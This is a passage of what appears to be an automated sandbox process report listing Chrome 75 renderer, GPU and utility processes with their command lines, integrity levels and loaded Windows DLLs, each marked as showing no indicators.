c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2516
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --disable-gpu-sandbox --use-gl=disabled --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=7099435145566375193 --mojo-platform-channel-handle=3352 /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\comdlg32.dll
c:\windows\system32\dbghelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll

PID
3996
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=11332535843943463526 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3028
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16590894789736148498 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3408
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=16905934409512059729 --mojo-platform-channel-handle=3440 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3800
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=3530612620193539477 --mojo-platform-channel-handle=2988 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2752
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=15558849959507287938 --mojo-platform-channel-handle=3532 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2824
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=5485486713184577789 --mojo-platform-channel-handle=3388 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3348
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=3850291655399701366 --mojo-platform-channel-handle=3376 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
1832
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=13493109673811416650 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2532
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=18077234366166093518 --mojo-platform-channel-handle=3976 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2336
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=5878304860776314350 --mojo-platform-channel-handle=3964 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2440
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=14522140084939050582 --mojo-platform-channel-handle=4052 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
